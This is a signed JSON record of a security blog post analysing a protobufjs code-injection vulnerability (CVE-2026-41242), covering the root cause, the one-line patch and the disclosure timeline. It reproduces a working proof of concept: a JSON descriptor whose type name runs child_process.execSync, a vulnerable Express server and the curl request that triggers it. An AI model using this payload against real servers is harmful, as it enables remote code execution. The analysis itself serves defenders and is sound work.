-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

NEFARIOUSPLAN-CANONICAL-V1
{"body_md":"## The codegen library treats the function-name parameter as source code\n\n`@protobufjs/codegen` is a hundred-line npm package that protobufjs uses to build per-type encoder, decoder, verifier, and converter functions at runtime. Its public API is one function: `codegen(params, name)`. The author appends to the body with format-string calls, then finalizes with a scope object. The build step is a string concatenation:\n\n```js\nfunction toString(functionNameOverride) {\n    return \"function \" + (functionNameOverride || functionName || \"\") +\n           \"(\" + (functionParams && functionParams.join(\",\") || \"\") +\n           \"){\\n  \" + body.join(\"\\n  \") + \"\\n}\";\n}\n```\n\nBody lines are appended with `%i`, `%j`, `%s` format specifiers. The JSON specifier is the load-bearing one: `gen(\"foo=%j\", value)` JSON-stringifies `value` so it embeds as a valid JS literal even when it carries quotes, newlines, or backslashes. Every author writing a body line understands that the formatter is responsible for escaping data into source.\n\nThe function-name parameter has no formatter. It is interpolated bare. The library's contract is implicit: callers must pass a string that is also a valid JavaScript identifier. Nothing in the library checks the contract. Nothing in the library documents it as a contract. The README's first sentence reads \"A minimalistic code generation utility.\" It is.\n\n## Six call sites, one trust boundary, and it lived nowhere\n\nprotobufjs builds five families of generated functions per message type. Each generator picks a function name in the same shape:\n\n```js\n// src/decoder.js:19\nvar gen = util.codegen([\"r\", \"l\", \"e\"], mtype.name + \"$decode\")\n// src/encoder.js:30\nvar gen = util.codegen([\"m\", \"w\"], mtype.name + \"$encode\")\n// src/verifier.js:125\nvar gen = util.codegen([\"m\"], mtype.name + \"$verify\")\n// src/converter.js:108\nvar gen = util.codegen([\"d\"], mtype.name + \"$fromObject\")\n// src/converter.js:211\nvar gen = util.codegen([\"m\", \"o\"], mtype.name + \"$toObject\")\n// src/type.js:200\nvar gen = util.codegen([\"p\"], mtype.name);\n```\n\nSix places. Every one of them appends a verb to `mtype.name` and passes the result as the function name. The name comes from `Type.prototype.name`, set in the constructor:\n\n```js\nfunction Type(name, options) {\n    Namespace.call(this, name, options);\n    ...\n}\n```\n\n`name` is whatever the caller passed. Pre-patch, the constructor performs no validation. The Namespace base class stores it on `this.name`. Six codegen sites read it back and concatenate.\n\nThe trust boundary lived nowhere. The decoder author trusted Type. Type trusted its caller. The codegen library trusted Type. None of the three layers between the wire and the generated `Function()` constructor held the responsibility of checking that the name was a JavaScript identifier. The patch makes Type the holder. Pre-patch, nobody held it.\n\n## The exploit primitive\n\nA protobuf descriptor in JSON form is a dictionary of message types, each with named fields. A field's `type` value is the name of either a primitive (`int32`, `string`) or another message type defined elsewhere in the same descriptor. `Root.fromJSON` walks the dictionary and constructs a `Type` per entry, taking the dictionary key as the name. The PoC's `payload.json` makes the dictionary key the injection vector:\n\n```json\n{\n  \"nested\": {\n    \"User\": {\n      \"fields\": {\n        \"id\":   { \"type\": \"int32\", \"id\": 1 },\n        \"data\": {\n          \"type\": \"Data(){console.log(process.mainModule.require('child_process').execSync('id').toString())};\\nfunction X\",\n          \"id\": 2\n        }\n      }\n    },\n    \"Data(){console.log(process.mainModule.require('child_process').execSync('id').toString())};\\nfunction X\": {\n      \"fields\": { \"content\": { \"type\": \"string\", \"id\": 1 } }\n    }\n  }\n}\n```\n\nTwo message types. The second is keyed by `Data(){...payload...};\\nfunction X`. `User.data` references it by that exact key. The vulnerable web app the PoC ships with is twenty lines:\n\n```js\nconst express = require('express');\nconst protobuf = require('protobufjs');\n\nconst app = express();\napp.use(express.json());\n\napp.post('/create_user', (request, response) => {\n    const descriptor = request.body;\n    const root = protobuf.Root.fromJSON(descriptor);\n    const UserType = root.lookupType('User');\n    const userBytes = Buffer.from([0x08, 0x01, 0x12, 0x07, 0x0a, 0x05, 0x68, 0x65, 0x6c, 0x6c, 0x6f]);\n    try { UserType.decode(userBytes); } catch (e) { }\n});\n\napp.listen(3000);\n```\n\nThe route accepts a JSON body, builds a protobuf root from it, looks up `User`, and decodes a fixed seven-byte payload. The `userBytes` decode to `User { id: 1, data: Data { content: \"hello\" } }`. The decode of the `data` field is what reaches the second Type and triggers code generation for it.\n\n`Type.prototype.decode` is a stub that calls `this.setup()` on first invocation and replaces itself with the generated function. `setup()` calls all five codegen generators in sequence. The first one is `encoder()`, which calls:\n\n```js\nvar gen = util.codegen([\"m\", \"w\"], mtype.name + \"$encode\")\n```\n\nFor the second Type, `mtype.name` is the malicious string. `mtype.name + \"$encode\"` becomes `Data(){...};\\nfunction X$encode`. The codegen library appends body lines, then finalizes. `toString()` returns:\n\n```\nfunction Data(){console.log(process.mainModule.require('child_process').execSync('id').toString())};\nfunction X$encode(m,w){\n  ...encoder body...\n}\n```\n\nThe library prepends `return ` to that source and passes it to the `Function` constructor:\n\n```js\nsource = \"return \" + source;\n...\nreturn Function.apply(null, scopeParams).apply(null, scopeValues);\n```\n\n`return function Data(){...}` is a return statement followed by a function expression. The expression evaluates to a function object; the return statement returns it; the rest of the source (the `X$encode` declaration) is unreachable code that never runs. The library then calls `.apply(null, scopeValues)` on the returned function. The returned function is `Data`. Calling it executes `console.log(process.mainModule.require('child_process').execSync('id').toString())`.\n\nThe single curl that fires this:\n\n```bash\ncurl -X POST -H 'Content-Type: application/json' \\\n  http://target:3000/create_user --data @payload.json\n```\n\nThe PoC's harness has no exposed return path for command output, so the demonstration writes to `console.log`. A real attack would write to a file, hit an outbound URL, or replace the function body with `eval(process.env.REMOTE_PAYLOAD)`. The descriptor is JSON; the parser reads it without size limit; the function-name slot accepts every Unicode character. The 4chech harness ships the minimum demonstration. The class admits arbitrarily larger payloads.\n\n## What the description names\n\nThe cve.org record reads: \"attackers can inject arbitrary code in the 'type' fields of protobuf definitions, which will then execute during object decoding using that definition.\" The description is correct on every word. It is also not enough to find the bug.\n\nA defender reading the description without the codepath looks for a JSON parser that evals input, finds none, and concludes the bug must be in protobuf-message bytes rather than protobuf-descriptor objects. The wire payload in the PoC is `[0x08, 0x01, 0x12, 0x07, 0x0a, 0x05, 0x68, 0x65, 0x6c, 0x6c, 0x6f]`, an unremarkable seven-byte serialization. The injection lives in the descriptor. The \"during object decoding\" timing means the codegen runs lazily on first `decode()` rather than eagerly during `Root.fromJSON`, so a server that parses descriptors but never decodes against them is not exploitable, and a server that does both is fully exploitable. The description leaves both halves of that distinction to the reader.\n\n## This is content-is-command\n\nA JSON descriptor is content. The codegen library is an interpreter that reads strings out of the descriptor and produces JavaScript. The bridge is the function-name parameter in `@protobufjs/codegen`, where strings cross from the data plane to the source-text plane without escaping. The pattern's [Content Is Command](/patterns/content-is-command) reading covers this exactly: an external input channel feeds an interpreter that treats it as instructions because the interpreter never separated instruction from data at the boundary the channel was crossing.\n\nThe closest sibling exhibit is graphql-ruby. CVE-2025-27407 took a JSON introspection document, read field names from it, and spliced them into a Ruby `class_eval <<-RUBY` HEREDOC that defined methods. The interpreter was the Ruby compiler; the bridge was an unescaped name interpolation; the content source was an external schema document. The graphql-ruby fix added `/^[_a-zA-Z][_a-zA-Z0-9]*$/` to the name handler and replaced the `class_eval` with a captured-closure `define_method`. The protobufjs case is the same shape with JavaScript and `Function()` in place of Ruby and `class_eval`, and a JSON descriptor in place of a JSON introspection document. The protobufjs fix is the regex equivalent. Both fixes name the contract the loader was supposed to enforce and never had.\n\n## The fix is at Type. The library is unchanged.\n\nThe patch is one line in `src/type.js`:\n\n```diff\n function Type(name, options) {\n+    name = name.replace(/\\W/g, \"\");\n     Namespace.call(this, name, options);\n```\n\n`\\W` matches every character that is not in `[A-Za-z0-9_]`. Parentheses, semicolons, newlines, dots, brackets, slashes, spaces, every Unicode codepoint outside the identifier class. The patch's commit message: \"There is no reason why the type name would contain anything other than alphanumeric characters. Filter the remaining characters with a regex.\" The contract is named for the first time in the line that enforces it.\n\n`@protobufjs/codegen` is a separate package on npm with its own version (`2.0.4` as shipped in vulnerable installs). The codegen package's `Codegen.toString` still concatenates the functionName parameter into source text without validation. Any other consumer of `@protobufjs/codegen` that passes caller-influenced strings as the function name has the same primitive available. The package's README, its TypeScript types, and its index.js source contain no statement that the function name must be a valid JavaScript identifier.\n\nprotobufjs's fix solves protobufjs. It is the right shape of fix; the Type constructor is the natural choke point for incoming descriptor data, and one regex there protects all six call sites with no per-site changes. It does not solve `@protobufjs/codegen`, which continues to publish under the contract-by-implication it always had. The function-name slot is the only parameter in `@protobufjs/codegen` with no escape formatter. It is also the only one this CVE ever needed.\n\n## The disclosure window was the diff\n\nCristian Staicu of Endor Labs filed protobufjs issue #2124 on February 25, 2026. The issue body contains no technical detail; it asks the maintainers to set up a security policy and a private advisory channel so the report can move out of the public tracker. Pull request #2127 with the one-line fix landed in master on March 11, 2026, with the commit message quoted above. The release tagged `protobufjs-cli-v2.0.1` carries the fix at `535df44`. The GitHub Security Advisory was not published until April 16, 2026.\n\nThirty-six days separated the public commit from the public advisory. The diff itself was the disclosure: a maintainer-written patch that strips non-alphanumeric characters from a type name describes a class of input that previously was not stripped, and the consumers of that name (the six codegen sites listed above) are the obvious places to look. The PoC at `4chech/CVE-2026-41242` ships with Russian comments (`// JSON-дескриптор из тела запроса`), pins `protobufjs ^7.5.4`, and reproduces against the upstream commit immediately preceding the fix. The author did not need access to the advisory to build the harness. The commit was enough.\n\nPoC: [4chech/CVE-2026-41242](https://github.com/4chech/CVE-2026-41242)","closing_line":"The patch closes this CVE. The codegen library that interpolated the name into source code is unchanged.","hook_md":"The patch is one line in the Type constructor. `name = name.replace(/\\W/g, \"\");`. It strips every character that is not a letter, a digit, or an underscore from anything passed as a protobuf type name. The line was added on March 10, 2026, and shipped in protobufjs 7.5.5 and 8.0.1 on April 16. For every prior release, the Type constructor accepted any string as a name. Five files and six call sites took that string and handed it to a code-generation library, which spliced it, raw, between the keyword `function` and the opening parenthesis of a function declaration.</hook_md>\n<parameter name=\"closing_line\">The patch closes this CVE. The codegen library that interpolated the name into source code is unchanged.","post_id":53,"slug":"protobufjs-cve-2026-41242-type-name-was-javascript","title":"CVE-2026-41242: protobufjs's Type Name Was JavaScript","type":"initial","unreadable_sentence":"The function-name slot is the only parameter in @protobufjs/codegen with no escape formatter. It is also the only one this CVE ever needed."}
-----BEGIN PGP SIGNATURE-----

iHUEARYIAB0WIQRf0htP5+SjynlxywneZjl4jgkQJgUCahMxGQAKCRDeZjl4jgkQ
JjG3AP9ub1kDEnd+YMuHrk6zlvBASmo15nXwEZjUzmmAMasdVwEAsZYJ3vNloTqS
R46lSlc8SkrGYjo7T/Fe9KX5Zr9FgQk=
=gIuC
-----END PGP SIGNATURE-----